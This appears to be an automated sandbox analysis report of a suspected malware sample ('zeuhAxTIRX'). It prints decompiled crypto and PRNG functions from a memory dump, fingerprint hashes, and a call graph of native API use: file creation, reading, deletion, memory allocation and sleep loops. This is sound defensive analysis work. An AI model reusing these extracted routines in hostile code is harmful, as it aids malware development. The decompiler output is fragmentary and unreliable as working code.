                                                                                                                • Opcode ID: bc61e76ea3e79533e31c83d56c90e2b10c5e114c50a1f86292c337f464773164
                                                                                                                • Instruction ID: c52b90075a256842ba2e603c9bf2bbc069e44e30dcc234962402aadc0841d6ed
                                                                                                                • Opcode Fuzzy Hash: bc61e76ea3e79533e31c83d56c90e2b10c5e114c50a1f86292c337f464773164
                                                                                                                • Instruction Fuzzy Hash: 9B5190B3E14A214BD318CE09CC50631B692EFD8312B5F81BEDD199B357CA34E9529B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E53899 Relevance: .1, Instructions: 112COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00E53899(signed char* __eax, void* __edi) {
				signed char* _t38;
				unsigned int _t66;
				unsigned int _t74;
				unsigned int _t82;
				unsigned int _t89;
				signed char _t95;
				signed char _t98;
				signed char _t101;

				_t38 = __eax;
				_pop(_t39);
				asm("movnti [ecx+0x34], esi");
				asm("repne push edi");
				_t66 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t95 = __eax[0xb];
				if((_t95 & 0x00000001) != 0) {
					_t66 = _t66 | 0x80000000;
				}
				_t38[0xc] = _t66 >> 0x18;
				_t38[0xf] = _t66;
				_t38[0xd] = _t66 >> 0x10;
				_t74 = ((((_t38[8] & 0x000000ff) << 0x00000008 | _t38[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t38[0xa] & 0xff) << 0x00000007 | (_t95 & 0x000000ff) >> 0x00000001;
				_t98 = _t38[7];
				_t38[0xe] = _t66 >> 8;
				if((_t98 & 0x00000001) != 0) {
					_t74 = _t74 | 0x80000000;
				}
				_t38[8] = _t74 >> 0x18;
				_t38[0xb] = _t74;
				_t38[9] = _t74 >> 0x10;
				_t82 = ((((_t38[4] & 0x000000ff) << 0x00000008 | _t38[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t38[6] & 0xff) << 0x00000007 | (_t98 & 0x000000ff) >> 0x00000001;
				_t101 = _t38[3];
				_t38[0xa] = _t74 >> 8;
				if((_t101 & 0x00000001) != 0) {
					_t82 = _t82 | 0x80000000;
				}
				_t38[4] = _t82 >> 0x18;
				_t38[7] = _t82;
				_t38[5] = _t82 >> 0x10;
				_t89 = (((_t38[1] & 0x000000ff) << 0x00000008 | _t38[2] & 0x000000ff) & 0x00ffffff | ( *_t38 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t101 & 0x000000ff) >> 0x00000001;
				 *_t38 = _t89 >> 0x18;
				_t38[1] = _t89 >> 0x10;
				_t38[6] = _t82 >> 8;
				_t38[2] = _t89 >> 8;
				_t38[3] = _t89;
				return _t38;
			}











                                                                                                                0x00e53899
                                                                                                                0x00e53899
                                                                                                                0x00e5389b
                                                                                                                0x00e5389f
                                                                                                                0x00e538ce
                                                                                                                0x00e538d0
                                                                                                                0x00e538d6
                                                                                                                0x00e538d8
                                                                                                                0x00e538d8
                                                                                                                0x00e538e4
                                                                                                                0x00e538e9
                                                                                                                0x00e538ef
                                                                                                                0x00e5391f
                                                                                                                0x00e53921
                                                                                                                0x00e53927
                                                                                                                0x00e5392d
                                                                                                                0x00e5392f
                                                                                                                0x00e5392f
                                                                                                                0x00e5393e
                                                                                                                0x00e53943
                                                                                                                0x00e53949
                                                                                                                0x00e53974
                                                                                                                0x00e53976
                                                                                                                0x00e5397c
                                                                                                                0x00e53982
                                                                                                                0x00e53984
                                                                                                                0x00e53984
                                                                                                                0x00e53993
                                                                                                                0x00e5399b
                                                                                                                0x00e5399e
                                                                                                                0x00e539c2
                                                                                                                0x00e539c9
                                                                                                                0x00e539d0
                                                                                                                0x00e539dc
                                                                                                                0x00e539df
                                                                                                                0x00e539e2
                                                                                                                0x00e539e6

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fcf0feeb9e6b2d39b635bf5971bcdeeba4c07f97f5899cffbbdd54775a4d1178
                                                                                                                • Instruction ID: 27160a0f4b85dbc697a95509d9c0906f71ef52de9d1262af8d5e48da8c31e9c4
                                                                                                                • Opcode Fuzzy Hash: fcf0feeb9e6b2d39b635bf5971bcdeeba4c07f97f5899cffbbdd54775a4d1178
                                                                                                                • Instruction Fuzzy Hash: B83193516586F14ED30E836D48B9675AED18E9720274EC2FEDADA6F2F3C0888409D3A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E538A3 Relevance: .1, Instructions: 108COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E538A3(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}











                                                                                                                0x00e538a3
                                                                                                                0x00e538ce
                                                                                                                0x00e538d0
                                                                                                                0x00e538d6
                                                                                                                0x00e538d8
                                                                                                                0x00e538d8
                                                                                                                0x00e538e4
                                                                                                                0x00e538e9
                                                                                                                0x00e538ef
                                                                                                                0x00e5391f
                                                                                                                0x00e53921
                                                                                                                0x00e53927
                                                                                                                0x00e5392d
                                                                                                                0x00e5392f
                                                                                                                0x00e5392f
                                                                                                                0x00e5393e
                                                                                                                0x00e53943
                                                                                                                0x00e53949
                                                                                                                0x00e53974
                                                                                                                0x00e53976
                                                                                                                0x00e5397c
                                                                                                                0x00e53982
                                                                                                                0x00e53984
                                                                                                                0x00e53984
                                                                                                                0x00e53993
                                                                                                                0x00e5399b
                                                                                                                0x00e5399e
                                                                                                                0x00e539c2
                                                                                                                0x00e539c9
                                                                                                                0x00e539d0
                                                                                                                0x00e539dc
                                                                                                                0x00e539df
                                                                                                                0x00e539e2
                                                                                                                0x00e539e6

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                • Instruction ID: 3d527ac528494b37bbf9d9a6f622762356ec6a236b1416f7b293200436ac6dd6
                                                                                                                • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                • Instruction Fuzzy Hash: C33172516587F14ED31E836D08BD675AED18E9720274EC2FEDADA6F2F3C4888408D3A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E706A3 Relevance: .1, Instructions: 93COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E706A3(char* _a4) {
				signed int _t30;
				signed int _t35;
				signed int _t36;
				signed int _t55;
				intOrPtr _t56;
				signed int _t66;
				intOrPtr _t67;
				char* _t68;
				signed int _t78;
				signed int _t80;

				_t68 = _a4;
				if(_t68 != 0) {
					if( *_t68 == 0) {
						_t2 = _t68 + 4; // 0xfffd5885
						_t35 =  *_t2;
						 *_t68 = 1;
						_t56 =  *0x7ffe0018;
						_t67 =  *0x7ffe001c;
						if(_t35 == 0) {
							_t36 =  *0x7ffe0014;
							do {
							} while (_t56 != _t67);
						} else {
							_t80 =  *0x7ffe0014;
							do {
							} while (_t56 != _t67);
							_t36 = _t35 * _t80;
						}
						 *(_t68 + 8) = _t36;
						 *(_t68 + 0xc) = 0x7b9;
						 *(_t68 + 0x10) = 0x6ccf;
						 *(_t68 + 0x14) = 0xa7d;
					}
					_t7 = _t68 + 8; // 0xfc33bff
					_t55 = ( *_t7 << 0x00000012 ^  *_t7 >> 0x00000007) & 0x0007ffff ^  *_t7 << 0x00000012 ^  *_t7 >> 0x0000000d;
					_t8 = _t68 + 0xc; // 0x1c084
					_t66 = ( *_t8 >> 0x00000019 ^  *_t8 * 0x00000004) & 0x0000001f ^  *_t8 >> 0x0000001b ^ _t20 + _t20 + _t20 + _t20;
					_t10 = _t68 + 0x10; // 0x38e85000
					_t23 =  *_t10;
					_t11 = _t68 + 0x14; // 0x8b000121
					_t78 = ( *_t10 >> 0x00000008 ^  *_t10 << 0x00000007) & 0x000007ff ^  *_t10 >> 0x00000015 ^ _t23 << 0x00000007;
					_t12 = _t68 + 0x14; // 0x8b000121
					_t13 = _t68 + 0x14; // 0x8b000121
					_t30 = ( *_t11 << 0x0000000d ^  *_t11 >> 0x00000009) & 0x000fffff ^  *_t12 >> 0x0000000c ^  *_t13 << 0x0000000d;
					 *(_t68 + 0x14) = _t30;
					 *(_t68 + 0x10) = _t78;
					 *(_t68 + 8) = _t55;
					 *(_t68 + 0xc) = _t66;
					return (_t30 ^ _t78 ^ _t66 ^ _t55) >> 1;
				} else {
					return 0;
				}
			}













                                                                                                                0x00e706a7
                                                                                                                0x00e706ac
                                                                                                                0x00e706b8
                                                                                                                0x00e706ba
                                                                                                                0x00e706ba
                                                                                                                0x00e706bd
                                                                                                                0x00e706c0
                                                                                                                0x00e706c6
                                                                                                                0x00e706ce
                                                                                                                0x00e706df
                                                                                                                0x00e706e4
                                                                                                                0x00e706e4
                                                                                                                0x00e706d0
                                                                                                                0x00e706d0
                                                                                                                0x00e706d6
                                                                                                                0x00e706d6
                                                                                                                0x00e706da
                                                                                                                0x00e706da
                                                                                                                0x00e706e8
                                                                                                                0x00e706eb
                                                                                                                0x00e706f2
                                                                                                                0x00e706f9
                                                                                                                0x00e706f9
                                                                                                                0x00e70700
                                                                                                                0x00e7071f
                                                                                                                0x00e70721
                                                                                                                0x00e70740
                                                                                                                0x00e70742
                                                                                                                0x00e70742
                                                                                                                0x00e70761
                                                                                                                0x00e70764
                                                                                                                0x00e70770
                                                                                                                0x00e7077d
                                                                                                                0x00e70783
                                                                                                                0x00e70785
                                                                                                                0x00e7078a
                                                                                                                0x00e70793
                                                                                                                0x00e70796
                                                                                                                0x00e7079d
                                                                                                                0x00e706ae
                                                                                                                0x00e706b2
                                                                                                                0x00e706b2

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 324750c234218eeb603b734050768f4d4c37e7fb986e1d53e48197728d8f51d7
                                                                                                                • Instruction ID: 15ef4c599e7592b7d0c6372a85701fa716ee48e82c0f63e34db45a3de66fd396
                                                                                                                • Opcode Fuzzy Hash: 324750c234218eeb603b734050768f4d4c37e7fb986e1d53e48197728d8f51d7
                                                                                                                • Instruction Fuzzy Hash: 9831AE72B106269BD754CE7AD880656B7E2FB88320B54C639D918D3B40E774F961CBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E51B80 Relevance: .1, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce7b95639ab056b4777caf7d4c95a9b735b66bdf00c3a572d17d5c4be402346a
                                                                                                                • Instruction ID: 26000f779729e5337aaa6a6889dc0da0288c2deb82376a3cf7801f0511ca2d4c
                                                                                                                • Opcode Fuzzy Hash: ce7b95639ab056b4777caf7d4c95a9b735b66bdf00c3a572d17d5c4be402346a
                                                                                                                • Instruction Fuzzy Hash: A331E072B006118FD75CCF45D494B66B793ABC8364B5AC2BDCE1A5B3A1CA74AD10CBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E51B7A Relevance: .1, Instructions: 73COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E00E51B7A(void* __eflags, void* _a8) {
				void* _v0;

				asm("repe sub al, [ecx-0xa]");
				if (__eflags != 0) goto L12;
			}




                                                                                                                0x00e51b7a
                                                                                                                0x00e51b7f

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 15e4c654d2c96c63ace2679b13f9f3be7f6346964235f1771fa5b7c7a825576b
                                                                                                                • Instruction ID: 6b7ce18a2ad55d55cc9e236e06088aa6c0f8f9c7112d7063930e473f714ddc32
                                                                                                                • Opcode Fuzzy Hash: 15e4c654d2c96c63ace2679b13f9f3be7f6346964235f1771fa5b7c7a825576b
                                                                                                                • Instruction Fuzzy Hash: 3F21DF72B00A114FD75C8E99D49456AB793ABC8214B4AC2BDCE2A9B3D1C574E921C7C0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:6.7%
                                                                                                                Dynamic/Decrypted Code Coverage:1.5%
                                                                                                                Signature Coverage:2.1%
                                                                                                                Total number of Nodes:1085
                                                                                                                Total number of Limit Nodes:128
                                                                                                                execution_graph 31511 4449540 LdrInitializeThunk 31515 2a59720 31516 2a59745 31515->31516 31521 2a5b160 31516->31521 31520 2a5979d 31522 2a5b184 31521->31522 31523 2a59778 31522->31523 31524 2a5b1c0 LdrLoadDll 31522->31524 31523->31520 31525 2a5cd20 31523->31525 31524->31523 31526 2a5cd4c 31525->31526 31536 2a6c650 31526->31536 31529 2a5cd6c 31529->31520 31533 2a5cda7 31547 2a6c900 31533->31547 31535 2a5cdca 31535->31520 31550 2a6d440 31536->31550 31538 2a5cd65 31538->31529 31539 2a6c690 31538->31539 31540 2a6d440 LdrLoadDll 31539->31540 31541 2a6c6ac 31540->31541 31560 4449710 LdrInitializeThunk 31541->31560 31542 2a5cd8f 31542->31529 31544 2a6cc80 31542->31544 31545 2a6d440 LdrLoadDll 31544->31545 31546 2a6cc9f 31545->31546 31546->31533 31548 2a6c91c NtClose 31547->31548 31549 2a6d440 LdrLoadDll 31547->31549 31548->31535 31549->31548 31551 2a6d4c5 31550->31551 31552 2a6d44f 31550->31552 31551->31538 31552->31551 31554 2a67840 31552->31554 31555 2a6784e 31554->31555 31557 2a6785a 31554->31557 31555->31557 31559 2a67cc0 LdrLoadDll 31555->31559 31557->31551 31558 2a679ac 31558->31551 31559->31558 31560->31542 31561 2a6b520 31572 2a6e2f0 31561->31572 31563 2a6b656 31564 2a6b55b 31564->31563 31565 2a5b160 LdrLoadDll 31564->31565 31566 2a6b59b 31565->31566 31567 2a67840 LdrLoadDll 31566->31567 31571 2a6b5c0 31567->31571 31568 2a6b5d0 Sleep 31568->31571 31571->31563 31571->31568 31575 2a6b1b0 LdrLoadDll 31571->31575 31576 2a6b380 LdrLoadDll 31571->31576 31577 2a6c9b0 31572->31577 31574 2a6e31d 31574->31564 31575->31571 31576->31571 31578 2a6d440 LdrLoadDll 31577->31578 31579 2a6c9cc NtAllocateVirtualMemory 31578->31579 31579->31574 31580 2a5ebef 31582 2a5ebdf 31580->31582 31583 2a5ec32 31582->31583 31584 2a67430 31582->31584 31585 2a67773 31584->31585 31587 2a67444 31584->31587 31585->31582 31587->31585 31623 2a6c0c0 31587->31623 31589 2a67575 31629 2a6c7d0 31589->31629 31590 2a67558 31626 2a6c8d0 31590->31626 31593 2a6759c 31632 2a6e370 31593->31632 31594 2a67562 31594->31582 31596 2a67737 31597 2a6c900 2 API calls 31596->31597 31600 2a6773e 31597->31600 31598 2a6774d 31689 2a67150 31598->31689 31600->31582 31602 2a67760 31602->31582 31603 2a67640 31604 2a676a7 31603->31604 31606 2a6764f 31603->31606 31604->31596 31605 2a676ba 31604->31605 31728 2a6c750 31605->31728 31608 2a67654 31606->31608 31609 2a67668 31606->31609 31727 2a67010 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31608->31727 31610 2a67685 31609->31610 31611 2a6766d 31609->31611 31610->31600 31647 2a66dd0 31610->31647 31635 2a670b0 31611->31635 31616 2a6765e 31616->31582 31617 2a6767b 31617->31582 31619 2a6771a 31621 2a6c900 2 API calls 31619->31621 31620 2a6769d 31620->31582 31622 2a67726 31621->31622 31622->31582 31624 2a6d440 LdrLoadDll 31623->31624 31625 2a67529 31623->31625 31624->31625 31625->31589 31625->31590 31625->31594 31627 2a6c8ec NtDeleteFile 31626->31627 31628 2a6d440 LdrLoadDll 31626->31628 31627->31594 31628->31627 31630 2a6c7ec NtCreateFile 31629->31630 31631 2a6d440 LdrLoadDll 31629->31631 31630->31593 31631->31630 31633 2a675a8 31632->31633 31732 2a6cae0 31632->31732 31633->31594 31633->31596 31633->31598 31633->31603 31636 2a670cc 31635->31636 31637 2a6c750 LdrLoadDll 31636->31637 31638 2a670ed 31637->31638 31639 2a670f4 31638->31639 31640 2a67108 31638->31640 31642 2a6c900 2 API calls 31639->31642 31641 2a6c900 2 API calls 31640->31641 31643 2a67111 31641->31643 31644 2a670fd 31642->31644 31735 2a6e490 31643->31735 31644->31617 31646 2a6711c 31646->31617 31648 2a66e4e 31647->31648 31649 2a66e1b 31647->31649 31651 2a66f99 31648->31651 31654 2a66e6a 31648->31654 31650 2a6c750 LdrLoadDll 31649->31650 31652 2a66e36 31650->31652 31653 2a6c750 LdrLoadDll 31651->31653 31655 2a6c900 2 API calls 31652->31655 31659 2a66fb4 31653->31659 31656 2a6c750 LdrLoadDll 31654->31656 31657 2a66e3f 31655->31657 31658 2a66e85 31656->31658 31657->31620 31661 2a66ea1 31658->31661 31662 2a66e8c 31658->31662 31753 2a6c790 LdrLoadDll 31659->31753 31665 2a66ea6 31661->31665 31666 2a66ebc 31661->31666 31664 2a6c900 2 API calls 31662->31664 31663 2a66fee 31667 2a6c900 2 API calls 31663->31667 31668 2a66e95 31664->31668 31669 2a6c900 2 API calls 31665->31669 31674 2a66ec1 31666->31674 31741 2a6e450 31666->31741 31670 2a66ff9 31667->31670 31668->31620 31671 2a66eaf 31669->31671 31670->31620 31671->31620 31683 2a66ed3 31674->31683 31744 2a6c880 31674->31744 31675 2a66f27 31676 2a66f3e 31675->31676 31752 2a6c710 LdrLoadDll 31675->31752 31678 2a66f45 31676->31678 31679 2a66f5a 31676->31679 31681 2a6c900 2 API calls 31678->31681 31680 2a6c900 2 API calls 31679->31680 31682 2a66f63 31680->31682 31681->31683 31684 2a66f8f 31682->31684 31747 2a6e170 31682->31747 31683->31620 31684->31620 31686 2a66f7a 31687 2a6e370 2 API calls 31686->31687 31688 2a66f83 31687->31688 31688->31620 31690 2a6718e 31689->31690 31691 2a6c750 LdrLoadDll 31689->31691 31692 2a67197 31690->31692 31693 2a671ac 31690->31693 31691->31690 31694 2a6c900 2 API calls 31692->31694 31695 2a671d0 31693->31695 31696 2a6721a 31693->31696 31709 2a671a0 31694->31709 31697 2a6c830 2 API calls 31695->31697 31698 2a67260 31696->31698 31699 2a6721f 31696->31699 31700 2a671f5 31697->31700 31702 2a67272 31698->31702 31708 2a673ed 31698->31708 31701 2a6c880 2 API calls 31699->31701 31699->31709 31703 2a6c900 2 API calls 31700->31703 31704 2a6724a 31701->31704 31705 2a67277 31702->31705 31714 2a672b2 31702->31714 31703->31709 31706 2a6c900 2 API calls 31704->31706 31707 2a6c830 2 API calls 31705->31707 31710 2a67253 31706->31710 31711 2a6729a 31707->31711 31708->31709 31712 2a6c900 2 API calls 31708->31712 31709->31602 31710->31602 31715 2a6c900 2 API calls 31711->31715 31716 2a6741e 31712->31716 31713 2a672b7 31713->31709 31717 2a6c830 2 API calls 31713->31717 31714->31713 31722 2a67396 31714->31722 31718 2a672a3 31715->31718 31716->31602 31719 2a672da 31717->31719 31718->31602 31720 2a6c900 2 API calls 31719->31720 31721 2a672e5 31720->31721 31721->31602 31722->31709 31754 2a6c830 31722->31754 31725 2a6c900 2 API calls 31726 2a673de 31725->31726 31726->31602 31727->31616 31729 2a67702 31728->31729 31730 2a6d440 LdrLoadDll 31728->31730 31731 2a6c790 LdrLoadDll 31729->31731 31730->31729 31731->31619 31733 2a6d440 LdrLoadDll 31732->31733 31734 2a6cafc RtlFreeHeap 31733->31734 31734->31633 31738 2a6caa0 31735->31738 31737 2a6e4aa 31737->31646 31739 2a6d440 LdrLoadDll 31738->31739 31740 2a6cabc RtlAllocateHeap 31739->31740 31740->31737 31742 2a6caa0 2 API calls 31741->31742 31743 2a6e468 31742->31743 31743->31674 31745 2a6d440 LdrLoadDll 31744->31745 31746 2a6c89c NtReadFile 31745->31746 31746->31675 31748 2a6e194 31747->31748 31749 2a6e17d 31747->31749 31748->31686 31749->31748 31750 2a6e450 2 API calls 31749->31750 31751 2a6e1ab 31750->31751 31751->31686 31752->31676 31753->31663 31755 2a6d440 LdrLoadDll 31754->31755 31756 2a6c84c 31755->31756 31759 4449560 LdrInitializeThunk 31756->31759 31757 2a673d5 31757->31725 31759->31757 31760 2a715dd 31763 2a6df10 31760->31763 31764 2a6df36 31763->31764 31771 2a5a0f0 31764->31771 31766 2a6df42 31767 2a6df70 31766->31767 31779 2a59100 31766->31779 31811 2a6cb20 31767->31811 31772 2a5a0fd 31771->31772 31814 2a5a040 31771->31814 31774 2a5a104 31772->31774 31826 2a59fe0 31772->31826 31774->31766 31780 2a59127 31779->31780 32087 2a5b630 31780->32087 31782 2a59139 32091 2a5b380 31782->32091 31784 2a5916b 31792 2a59172 31784->31792 32134 2a5b2b0 LdrLoadDll 31784->32134 31786 2a5942d 31786->31767 31788 2a591e5 31788->31786 31789 2a6e450 2 API calls 31788->31789 31790 2a591fb 31789->31790 31791 2a6e450 2 API calls 31790->31791 31793 2a5920c 31791->31793 31792->31786 32095 2a5e320 31792->32095 31794 2a6e450 2 API calls 31793->31794 31795 2a5921d 31794->31795 32107 2a5c8a0 31795->32107 31797 2a5922a 31798 2a67430 10 API calls 31797->31798 31799 2a5923b 31798->31799 31800 2a67430 10 API calls 31799->31800 31801 2a5924c 31800->31801 31802 2a59270 31801->31802 31803 2a67430 10 API calls 31801->31803 31804 2a67430 10 API calls 31802->31804 31810 2a592b8 31802->31810 31805 2a59269 31803->31805 31807 2a59287 31804->31807 32135 2a5c9f0 LdrLoadDll 31805->32135 31807->31810 32136 2a5d390 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 31807->32136 31810->31786 32119 2a58d80 31810->32119 31812 2a6d440 LdrLoadDll 31811->31812 31813 2a6cb3f 31812->31813 31815 2a5a053 31814->31815 31865 2a6b0c0 LdrLoadDll 31814->31865 31845 2a6af80 31815->31845 31818 2a5a066 31818->31772 31819 2a5a05c 31819->31818 31848 2a6d7c0 31819->31848 31821 2a5a0a3 31821->31818 31859 2a59e80 31821->31859 31823 2a5a0c3 31866 2a598e0 LdrLoadDll 31823->31866 31825 2a5a0d5 31825->31772 32067 2a6dab0 31826->32067 31829 2a6dab0 LdrLoadDll 31830 2a5a011 31829->31830 31831 2a6dab0 LdrLoadDll 31830->31831 31832 2a5a02a 31831->31832 31833 2a5e0e0 31832->31833 31834 2a5e0f9 31833->31834 32071 2a5b4b0 31834->32071 31836 2a5e10c 31837 2a6c650 LdrLoadDll 31836->31837 31838 2a5e11b 31837->31838 31844 2a5a115 31838->31844 32075 2a6cc40 31838->32075 31842 2a6c900 2 API calls 31842->31844 31843 2a5e15d 31843->31842 31844->31766 31867 2a6ca70 31845->31867 31849 2a6d7d9 31848->31849 31850 2a67430 10 API calls 31849->31850 31851 2a6d7f1 31850->31851 31852 2a6d7fa 31851->31852 31870 2a6d600 31851->31870 31852->31821 31854 2a6d80e 31854->31852 31887 2a6c370 31854->31887 31856 2a6d842 31857 2a6e370 2 API calls 31856->31857 31858 2a6d86c 31857->31858 31858->31821 32045 2a57670 31859->32045 31861 2a59ea1 31861->31823 31862 2a59e9a 31862->31861 32058 2a57930 31862->32058 31865->31815 31866->31825 31868 2a6af95 31867->31868 31869 2a6d440 LdrLoadDll 31867->31869 31868->31819 31869->31868 31871 2a6d61b 31870->31871 31872 2a6d62d 31871->31872 31873 2a6e2f0 2 API calls 31871->31873 31872->31854 31874 2a6d64d 31873->31874 31892 2a66a30 31874->31892 31876 2a6d670 31876->31872 31877 2a66a30 3 API calls 31876->31877 31879 2a6d692 31877->31879 31879->31872 31924 2a67d90 31879->31924 31880 2a6d71a 31881 2a6d72a 31880->31881 32019 2a6d3c0 LdrLoadDll 31880->32019 31935 2a6d230 31881->31935 31884 2a6d758 32014 2a6c330 31884->32014 31886 2a6d782 31886->31854 31888 2a6c38c 31887->31888 31889 2a6d440 LdrLoadDll 31887->31889 32042 444967a 31888->32042 31889->31888 31890 2a6c3a7 31890->31856 31893 2a66a41 31892->31893 31895 2a66a49 31892->31895 31893->31876 31894 2a66d1c 31894->31876 31895->31894 32020 2a6f4f0 31895->32020 31897 2a66a9d 31898 2a6f4f0 2 API calls 31897->31898 31901 2a66aa8 31898->31901 31899 2a66af6 31902 2a6f4f0 2 API calls 31899->31902 31901->31899 31903 2a6f620 3 API calls 31901->31903 32034 2a6f590 LdrLoadDll RtlAllocateHeap RtlFreeHeap 31901->32034 31905 2a66b0a 31902->31905 31903->31901 31904 2a66b67 31906 2a6f4f0 2 API calls 31904->31906 31905->31904 32025 2a6f620 31905->32025 31908 2a66b7d 31906->31908 31909 2a66bba 31908->31909 31912 2a6f620 3 API calls 31908->31912 31910 2a6f4f0 2 API calls 31909->31910 31911 2a66bc5 31910->31911 31913 2a6f620 3 API calls 31911->31913 31919 2a66bff 31911->31919 31912->31908 31913->31911 31916 2a6f550 2 API calls 31917 2a66cfe 31916->31917 31918 2a6f550 2 API calls 31917->31918 31920 2a66d08 31918->31920 32031 2a6f550 31919->32031 31921 2a6f550 2 API calls 31920->31921 31922 2a66d12 31921->31922 31923 2a6f550 2 API calls 31922->31923 